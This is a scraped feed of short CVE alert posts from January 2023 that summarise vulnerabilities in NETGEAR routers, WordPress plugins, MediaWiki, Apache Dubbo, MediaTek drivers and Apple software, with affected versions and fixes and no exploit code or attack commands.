🚨 CVE-2022-48196Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects RAX40 before 1.0.2.60, RAX35 before 1.0.2.60, R6400v2 before 1.0.4.122, R6700v3 before 1.0.4.122, R6900P before 1.3.3.152, R7000P before 1.3.3.152, R7000 before 1.0.11.136, R7960P before 1.4.4.94, and R8000P before 1.4.4.94.🎖@cveNotify |
|
| 2023-01-10 15:29:40 |
🚨 CVE-2020-26948Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter.🎖@cveNotify |
|
| 2023-01-10 15:29:39 |
🚨 CVE-2022-46309Vitals ESP upload function has a path traversal vulnerability. A remote attacker with general user privilege can exploit this vulnerability to access arbitrary system files.🎖@cveNotify |
|
| 2023-01-10 15:29:38 |
🚨 CVE-2014-125039A vulnerability, which was classified as problematic, has been found in kkokko NeoXplora. Affected by this issue is some unknown functionality of the component Trainer Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is dce1aecd6ee050a29f953ffd8f02f21c7c13f1e6. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217352.🎖@cveNotify |
|
| 2023-01-10 15:29:37 |
🚨 CVE-2021-32824Apache Dubbo is a java based, open source RPC framework. Versions prior to 2.6.10 and 2.7.10 are vulnerable to pre-auth remote code execution via arbitrary bean manipulation in the Telnet handler. The Dubbo main service port can be used to access a Telnet Handler which offers some basic methods to collect information about the providers and methods exposed by the service and it can even allow to shutdown the service. This endpoint is unprotected. Additionally, a provider method can be invoked using the `invoke` handler. This handler uses a safe version of FastJson to process the call arguments. However, the resulting list is later processed with `PojoUtils.realize` which can be used to instantiate arbitrary classes and invoke its setters. Even though FastJson is properly protected with a default blocklist, `PojoUtils.realize` is not, and an attacker can leverage that to achieve remote code execution. Versions 2.6.10 and 2.7.10 contain fixes for this issue.🎖@cveNotify |
|
| 2023-01-10 15:29:36 |
🚨 CVE-2023-0039The User Post Gallery - UPG plugin for WordPress is vulnerable to authorization bypass which leads to remote command execution due to the use of a nopriv AJAX action and user supplied function calls and parameters in versions up to, and including 2.19. This makes it possible for unauthenticated attackers to call arbitrary PHP functions and perform actions like adding new files that can be webshells and updating the site's options to allow anyone to register as an administrator.🎖@cveNotify |
|
| 2023-01-10 12:29:44 |
🚨 CVE-2022-4294Norton, Avira, Avast and AVG Antivirus for Windows may be susceptible to a Privilege Escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.🎖@cveNotify |
|
| 2023-01-10 12:29:43 |
🚨 CVE-2023-22909An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. SpecialMobileHistory allows remote attackers to cause a denial of service because database queries are slow.🎖@cveNotify |
|
| 2023-01-10 12:29:39 |
🚨 CVE-2023-22911An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. E-Widgets does widget replacement in HTML attributes, which can lead to XSS, because widget authors often do not expect that their widget is executed in an HTML attribute context.🎖@cveNotify |
|
| 2023-01-10 12:29:38 |
🚨 CVE-2017-20166Ecto 2.2.0 lacks a certain protection mechanism associated with the interaction between is_nil and raise.🎖@cveNotify |
|
| 2023-01-10 12:29:37 |
🚨 CVE-2023-22903api/views/user.py in LibrePhotos before e19e539 has incorrect access control.🎖@cveNotify |
|
| 2023-01-10 07:30:03 |
🚨 CVE-2022-32658In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220705059; Issue ID: GN20220705059.🎖@cveNotify |
|
| 2023-01-10 07:30:02 |
🚨 CVE-2022-32657In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220705042; Issue ID: GN20220705042.🎖@cveNotify |
|
| 2023-01-10 07:30:01 |
🚨 CVE-2022-32653In mtk-aie, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07262518; Issue ID: ALPS07262518.🎖@cveNotify |
|
| 2023-01-10 07:29:58 |
🚨 CVE-2022-45867MyBB before 1.8.33 allows Directory Traversal. The Admin CP Languages module allows remote authenticated users, with high privileges, to achieve local file inclusion and execution.🎖@cveNotify |
|
| 2023-01-10 07:29:57 |
🚨 CVE-2022-39039aEnrich’s a+HRD has inadequate filtering for specific URL parameter. An unauthenticated remote attacker can exploit this vulnerability to send arbitrary HTTP(s) request to launch Server-Side Request Forgery (SSRF) attack, to perform arbitrary system command or disrupt service.🎖@cveNotify |
|
| 2023-01-10 07:29:56 |
🚨 CVE-2022-39040aEnrich a+HRD log read function has a path traversal vulnerability. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.🎖@cveNotify |
|
| 2023-01-10 07:29:55 |
🚨 CVE-2022-32652In mtk-aie, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07262617; Issue ID: ALPS07262617.🎖@cveNotify |
|
| 2023-01-10 07:29:54 |
🚨 CVE-2023-0013The ABAP Keyword Documentation of SAP NetWeaver Application Server - versions 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, for ABAP and ABAP Platform does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. On successful exploitation an attacker can cause limited impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-01-10 07:29:53 |
🚨 CVE-2023-0012In SAP Host Agent (Windows) - versions 7.21, 7.22, an attacker who gains local membership to SAP_LocalAdmin could be able to replace executables with a malicious file that will be started under a privileged account. Note that by default all user members of SAP_LocaAdmin are denied the ability to logon locally by security policy so that this can only occur if the system has already been compromised.🎖@cveNotify |
|
| 2023-01-10 07:29:52 |
🚨 CVE-2022-37290GNOME Nautilus 42.2 allows a NULL pointer dereference and get_basename application crash via a pasted ZIP archive.🎖@cveNotify |
|
| 2023-01-10 07:29:48 |
🚨 CVE-2022-32651In mtk-aie, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07225857; Issue ID: ALPS07225857.🎖@cveNotify |
|
| 2023-01-10 07:29:47 |
🚨 CVE-2022-32650In mtk-isp, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07225853; Issue ID: ALPS07225853.🎖@cveNotify |
|
| 2023-01-10 07:29:46 |
🚨 CVE-2022-32647In ccu, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07554646; Issue ID: ALPS07554646.🎖@cveNotify |
|
| 2023-01-10 07:29:45 |
🚨 CVE-2022-32648In disp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06535964; Issue ID: ALPS06535964.🎖@cveNotify |
|
| 2023-01-10 07:29:44 |
🚨 CVE-2022-32649In jpeg, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07225840; Issue ID: ALPS07225840.🎖@cveNotify |
|
| 2023-01-10 07:29:40 |
🚨 CVE-2022-32645In vow, there is a possible information disclosure due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07494477; Issue ID: ALPS07494477.🎖@cveNotify |
|
| 2023-01-10 07:29:39 |
🚨 CVE-2022-32644In vow, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07494473; Issue ID: ALPS07494473.🎖@cveNotify |
|
| 2023-01-10 07:29:38 |
🚨 CVE-2022-32641In meta wifi, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07453594; Issue ID: ALPS07453594.🎖@cveNotify |
|
| 2023-01-10 07:29:37 |
🚨 CVE-2022-32640In meta wifi, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07441652; Issue ID: ALPS07441652.🎖@cveNotify |
|
| 2023-01-10 02:30:01 |
🚨 CVE-2022-4325The Post Status Notifier Lite WordPress plugin before 1.10.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which can be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-01-10 02:30:00 |
🚨 CVE-2022-4368The WP CSV WordPress plugin through 1.8.0.0 does not sanitize and escape a parameter before outputting it back in the page when importing a CSV, and doe snot have CSRF checks in place as well, leading to a Reflected Cross-Site Scripting.🎖@cveNotify |
|
| 2023-01-10 02:29:59 |
🚨 CVE-2022-4374The Bg Bible References WordPress plugin through 3.8.14 does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.🎖@cveNotify |
|
| 2023-01-10 02:29:58 |
🚨 CVE-2022-4392The iPanorama 360 WordPress Virtual Tour Builder plugin through 1.6.29 does not sanitise and escape some of its settings, which could allow users such as contributor+ to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-01-10 02:29:57 |
🚨 CVE-2022-4393The ImageLinks Interactive Image Builder for WordPress plugin through 1.5.3 does not sanitise and escape some of its settings, which could allow users such as contributor+ to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-01-10 02:29:53 |
🚨 CVE-2022-4394The iPages Flipbook For WordPress plugin through 1.4.6 does not sanitise and escape some of its settings, which could allow users such as contributor+ to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-01-10 02:29:52 |
🚨 CVE-2022-4426The Mautic Integration for WooCommerce WordPress plugin before 1.0.3 does not have proper CSRF check when updating settings, and does not ensure that the options to be updated belong to the plugin, allowing attackers to make a logged in admin change arbitrary blog options via a CSRF attack.🎖@cveNotify |
|
| 2023-01-10 02:29:51 |
🚨 CVE-2022-4468The WP Recipe Maker WordPress plugin before 8.6.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-01-10 02:29:50 |
🚨 CVE-2022-4491The WP-Table Reloaded WordPress plugin through 1.9.4 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks, which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-10 02:29:46 |
🚨 CVE-2022-4497The Jetpack CRM WordPress plugin before 5.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins🎖@cveNotify |
|
| 2023-01-10 02:29:45 |
🚨 CVE-2022-3416The WPtouch WordPress plugin before 4.3.45 does not properly validate images to be uploaded, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)🎖@cveNotify |
|
| 2023-01-10 02:29:44 |
🚨 CVE-2022-3923The ActiveCampaign for WooCommerce WordPress plugin through 1.9.6 does not have authorisation check when cleaning up its error logs via an AJAX action, which could allow any authenticated users, such as subscriber to call it and remove error logs.🎖@cveNotify |
|
| 2023-01-10 02:29:43 |
🚨 CVE-2022-3417The WPtouch WordPress plugin before 4.3.45 unserialises the content of an imported settings file, which could lead to PHP object injections issues when an user import (intentionally or not) a malicious settings file and a suitable gadget chain is present on the blog.🎖@cveNotify |
|
| 2023-01-10 02:29:39 |
🚨 CVE-2022-4102The Royal Elementor Addons WordPress plugin before 1.3.56 does not have authorization and CSRF checks when deleting a template and does not ensure that the post to be deleted is a template. This could allow any authenticated users, such as subscribers, to delete arbitrary posts assuming they know the related slug.🎖@cveNotify |
|
| 2023-01-10 02:29:38 |
🚨 CVE-2022-4196The Multi Step Form WordPress plugin before 1.7.8 does not sanitise and escape some of its form fields, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-01-10 02:29:37 |
🚨 CVE-2022-4103The Royal Elementor Addons WordPress plugin before 1.3.56 does not have authorisation and CSRF checks when creating a template, and does not ensure that the post created is a template. This could allow any authenticated users, such as subscriber to create a post (as well as any post type) with an arbitrary title🎖@cveNotify |
|
| 2023-01-10 02:29:36 |
🚨 CVE-2022-4301The Sunshine Photo Cart WordPress plugin before 2.9.15 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.🎖@cveNotify |
|
| 2023-01-10 02:29:35 |
🚨 CVE-2022-4391The Vision Interactive For WordPress plugin through 1.5.3 does not sanitise and escape some of its settings, which could allow users such as contributor+ to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-01-10 00:29:36 |
🚨 CVE-2021-46848GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.🎖@cveNotify |
|
| 2023-01-10 00:29:35 |
🚨 CVE-2022-4871A vulnerability classified as problematic was found in ummmmm nflpick-em.com up to 2.2.x. This vulnerability affects the function _Load_Users of the file html/includes/runtime/admin/JSON/LoadUsers.php. The manipulation of the argument sort leads to sql injection. The attack can be initiated remotely. The name of the patch is dd77a35942f527ea0beef5e0ec62b92e8b93211e. It is recommended to apply a patch to fix this issue. VDB-217270 is the identifier assigned to this vulnerability. NOTE: JSON entrypoint is only accessible via an admin account🎖@cveNotify |
|
| 2023-01-09 22:29:59 |
🚨 CVE-2022-42266NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where an unprivileged regular user can cause exposure of sensitive information to an actor that is not explicitly authorized to have access to that information, which may lead to limited information disclosure.🎖@cveNotify |
|
| 2023-01-09 22:29:58 |
🚨 CVE-2022-42269NVIDIA Trusted OS contains a vulnerability in an SMC call handler, where failure to validate untrusted input may allow a highly privileged local attacker to cause information disclosure and compromise integrity. The scope of the impact can extend to other components.🎖@cveNotify |
|
| 2023-01-09 22:29:57 |
🚨 CVE-2022-43438The Administrator function of EasyTest has an Incorrect Authorization vulnerability. A remote attacker authenticated as a general user can exploit this vulnerability to bypass the intended access restrictions, to make API functions calls, manipulate system and terminate service.🎖@cveNotify |
|
| 2023-01-09 22:29:56 |
🚨 CVE-2022-42270NVIDIA distributions of Linux contain a vulnerability in nvdla_emu_task_submit, where unvalidated input may allow a local attacker to cause stack-based buffer overflow in kernel code, which may lead to escalation of privileges, compromised integrity and confidentiality, and denial of service.🎖@cveNotify |
|
| 2023-01-09 22:29:52 |
🚨 CVE-2022-4302The White Label CMS WordPress plugin before 2.5 unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.🎖@cveNotify |
|
| 2023-01-09 22:29:51 |
🚨 CVE-2022-4352The Qe SEO Handyman WordPress plugin through 1.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin🎖@cveNotify |
|
| 2023-01-09 22:29:50 |
🚨 CVE-2022-4324The Custom Field Template WordPress plugin before 2.5.8 unserialises the content of an imported file, which could lead to PHP object injections issues when a high privilege user import (intentionally or not) a malicious Customizer Styling file and a suitable gadget chain is present on the blog.🎖@cveNotify |
|
| 2023-01-09 22:29:49 |
🚨 CVE-2022-4329The Product list Widget for Woocommerce WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high privilege one like admin).🎖@cveNotify |
|
| 2023-01-09 22:29:45 |
🚨 CVE-2022-4362The Popup Maker WordPress plugin before 1.16.9 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-01-09 22:29:44 |
🚨 CVE-2022-3460In affected versions of Octopus Deploy it is possible for certain types of sensitive variables to inadvertently become unmasked when viewed in variable preview.🎖@cveNotify |
|
| 2023-01-09 22:29:43 |
🚨 CVE-2022-4369The WP-Lister Lite for Amazon WordPress plugin before 2.4.4 does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which can be used against high-privilege users such as admin.🎖@cveNotify |
|
| 2023-01-09 22:29:39 |
🚨 CVE-2022-4355The LetsRecover WordPress plugin through 1.1.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin🎖@cveNotify |
|
| 2023-01-09 22:29:38 |
🚨 CVE-2022-33321Cleartext Transmission of Sensitive Information vulnerability due to the use of Basic Authentication for HTTP connections in Mitsubishi Electric consumer electronics products (PHOTOVOLTAIC COLOR MONITOR ECO-GUIDE, HEMS adapter, Wi-Fi Interface, Air Conditioning, Induction hob, Mitsubishi Electric HEMS Energy Measurement Unit, Refrigerator, Remote control with Wi-Fi Interface, BATHROOM THERMO VENTILATOR, Rice cooker, Mitsubishi Electric HEMS control adapter, Energy Recovery Ventilator, Smart Switch, Ventilating Fan, Range hood fan, Energy Measurement Unit and Air Purifier) allows a remote unauthenticated attacker to disclose information in the products or cause a denial of service (DoS) condition as a result by sniffing credential information (username and password). The wide range of models/versions of Mitsubishi Electric consumer electronics products are affected by this vulnerability. As for the affected product models/versions, see the Mitsubishi Electric's advisory which is listed in [References] section.🎖@cveNotify |
|
| 2023-01-09 22:29:37 |
🚨 CVE-2022-4370The multimedial images WordPress plugin through 1.0b does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.🎖@cveNotify |
|
| 2023-01-09 22:29:36 |
🚨 CVE-2022-4371The Web Invoice WordPress plugin through 2.1.3 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL Injection exploitable by high privilege users such as admin by default. However, depending on the plugin configuration, other users, such as subscriber could exploit this as well🎖@cveNotify |
|
| 2023-01-09 19:29:55 |
🚨 CVE-2022-4114The Superio WordPress theme does not sanitise and escape some parameters, which could allow users with a role as low as a subscriber to perform Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-01-09 19:29:54 |
🚨 CVE-2022-4855A vulnerability, which was classified as critical, was found in SourceCodester Lead Management System 1.0. Affected is an unknown function of the file login.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-217020.🎖@cveNotify |
|
| 2023-01-09 19:29:53 |
🚨 CVE-2014-125035A vulnerability classified as problematic was found in Jobs-Plugin. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. The name of the patch is b8a56718b1d42834c6ec51d9c489c5dc20471d7b. It is recommended to apply a patch to fix this issue. The identifier VDB-217189 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-09 19:29:49 |
🚨 CVE-2019-25093A vulnerability, which was classified as problematic, was found in dragonexpert Recent Threads on Index. Affected is the function recentthread_list_threads of the file inc/plugins/recentthreads/hooks.php of the component Setting Handler. The manipulation of the argument recentthread_forumskip leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 051465d807a8fcc6a8b0f4bcbb19299672399f48. It is recommended to apply a patch to fix this issue. VDB-217182 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-09 19:29:48 |
🚨 CVE-2022-4049The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.🎖@cveNotify |
|
| 2023-01-09 19:29:47 |
🚨 CVE-2021-4297A vulnerability has been found in trampgeek jobe up to 1.6.4 and classified as problematic. This vulnerability affects the function runs_post of the file application/controllers/Restapi.php. The manipulation of the argument sourcefilename leads to an unknown weakness. Upgrading to version 1.6.5 is able to address this issue. The name of the patch is 694da5013dbecc8d30dd83e2a83e78faadf93771. It is recommended to upgrade the affected component. VDB-217174 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-09 19:29:43 |
🚨 CVE-2022-4059The Cryptocurrency Widgets Pack WordPress plugin through 1.8.1 does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.🎖@cveNotify |
|
| 2023-01-09 19:29:42 |
🚨 CVE-2022-4057The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.🎖@cveNotify |
|
| 2023-01-09 19:29:41 |
🚨 CVE-2018-25059A vulnerability was found in pastebinit up to 0.2.2 and classified as problematic. Affected by this issue is the function pasteHandler of the file server.go. The manipulation of the argument r.URL.Path leads to path traversal. Upgrading to version 0.2.3 is able to address this issue. The name of the patch is 1af2facb6d95976c532b7f8f82747d454a092272. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217040.🎖@cveNotify |
|
| 2023-01-09 19:29:38 |
🚨 CVE-2015-10006A vulnerability, which was classified as problematic, has been found in admont28 Ingnovarq. Affected by this issue is some unknown functionality of the file app/controller/insertarSliderAjax.php. The manipulation of the argument imagetitle leads to cross site scripting. The attack may be launched remotely. The name of the patch is 9d18a39944d79dfedacd754a742df38f99d3c0e2. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217172.🎖@cveNotify |
|
| 2023-01-09 19:29:37 |
🚨 CVE-2022-30519XSS in signing form in Reprise Software RLM License Administration v14.2BL4 allows remote attacker to inject arbitrary code via password field.🎖@cveNotify |
|
| 2023-01-09 19:29:36 |
🚨 CVE-2022-37898Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities results in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-01-09 17:31:45 |
🚨 CVE-2022-32942The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-01-09 17:31:42 |
🚨 CVE-2022-32945An access issue was addressed with additional sandbox restrictions on third-party apps. This issue is fixed in macOS Ventura 13. An app may be able to record audio with paired AirPods.🎖@cveNotify |
|
| 2023-01-09 17:31:39 |
🚨 CVE-2022-42821A logic issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.6.2, macOS Big Sur 11.7.2, macOS Ventura 13. An app may bypass Gatekeeper checks.🎖@cveNotify |
|
| 2023-01-09 17:31:35 |
🚨 CVE-2022-32833An issue existed with the file paths used to store website data. The issue was resolved by improving how website data is stored. This issue is fixed in iOS 16. An unauthorized user may be able to access browsing history.🎖@cveNotify |
|
| 2023-01-09 17:31:31 |
🚨 CVE-2022-42863A memory corruption issue was addressed with improved state management. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-01-09 17:31:27 |
🚨 CVE-2022-42859Multiple issues were addressed by removing the vulnerable code. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, watchOS 9.2. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2023-01-09 17:31:22 |
🚨 CVE-2022-42854The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.6.2, macOS Ventura 13.1. An app may be able to disclose kernel memory.🎖@cveNotify |
|
| 2023-01-09 17:31:17 |
🚨 CVE-2022-42856A type confusion issue was addressed with improved state handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.1.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1..🎖@cveNotify |
|
| 2023-01-09 17:31:13 |
🚨 CVE-2022-42851The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2, tvOS 16.2. Parsing a maliciously crafted TIFF file may lead to disclosure of user information.🎖@cveNotify |
|
| 2023-01-09 17:31:07 |
🚨 CVE-2022-42850The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-01-09 17:31:03 |
🚨 CVE-2022-42852The issue was addressed with improved memory handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may result in the disclosure of process memory.🎖@cveNotify |
|
| 2023-01-09 17:30:59 |
🚨 CVE-2022-42853An access issue was addressed with improved access restrictions. This issue is fixed in macOS Ventura 13.1. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2023-01-09 17:30:53 |
🚨 CVE-2022-42845The issue was addressed with improved memory handling. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app with root privileges may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-01-09 17:30:49 |
🚨 CVE-2022-42846The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2, iOS 15.7.2 and iPadOS 15.7.2. Parsing a maliciously crafted video file may lead to unexpected system termination.🎖@cveNotify |
|
| 2023-01-09 17:30:44 |
🚨 CVE-2022-42847An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-01-09 17:30:38 |
🚨 CVE-2022-42848A logic issue was addressed with improved checks. This issue is fixed in iOS 16.2 and iPadOS 16.2, iOS 15.7.2 and iPadOS 15.7.2, tvOS 16.2. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-01-09 17:30:33 |
🚨 CVE-2022-42849An access issue existed with privileged API calls. This issue was addressed with additional restrictions. This issue is fixed in iOS 16.2 and iPadOS 16.2, tvOS 16.2, watchOS 9.2. A user may be able to elevate privileges.🎖@cveNotify |
|
| 2023-01-09 17:30:28 |
🚨 CVE-2022-42843This issue was addressed with improved data protection. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, tvOS 16.2, watchOS 9.2. A user may be able to view sensitive user information.🎖@cveNotify |
|
| 2023-01-09 17:30:23 |
🚨 CVE-2022-42844The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2. An app may be able to break out of its sandbox.🎖@cveNotify |
|
| 2023-01-09 17:30:18 |
🚨 CVE-2022-46699A memory corruption issue was addressed with improved state management. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-01-09 17:30:15 |
🚨 CVE-2022-46700A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-01-09 17:30:12 |
🚨 CVE-2022-46694An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in iOS 16.2 and iPadOS 16.2, iOS 15.7.2 and iPadOS 15.7.2, tvOS 16.2, watchOS 9.2. Parsing a maliciously crafted video file may lead to kernel code execution.🎖@cveNotify |
|
| 2023-01-09 17:30:09 |
🚨 CVE-2022-46695A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. This issue is fixed in tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Visiting a website that frames malicious content may lead to UI spoofing.🎖@cveNotify |
|
| 2023-01-09 17:30:07 |
🚨 CVE-2022-46696A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-01-09 16:29:54 |
🚨 CVE-2022-37785An issue was discovered in WeCube Platform 3.2.2. Cleartext passwords are displayed in the configuration for terminal plugins.🎖@cveNotify |
|
| 2023-01-09 16:29:53 |
🚨 CVE-2017-20158** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in vova07 Yii2 FileAPI Widget up to 0.1.8. It has been declared as problematic. Affected by this vulnerability is the function run of the file actions/UploadAction.php. The manipulation of the argument file leads to cross site scripting. The attack can be launched remotely. Upgrading to version 0.1.9 is able to address this issue. The name of the patch is c00d1e4fc912257fca1fce66d7a163bdbb4c8222. It is recommended to upgrade the affected component. The identifier VDB-217141 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-09 16:29:49 |
🚨 CVE-2022-48195An issue was discovered in Mellium mellium.im/sasl before 0.3.1. When performing SCRAM-based SASL authentication, if the remote end advertises support for channel binding, no random nonce is generated (instead, the nonce is empty). This causes authentication to fail in the best case, but (if paired with a remote end that does not validate the length of the nonce) could lead to insufficient randomness being used during authentication.🎖@cveNotify |
|
| 2023-01-09 16:29:48 |
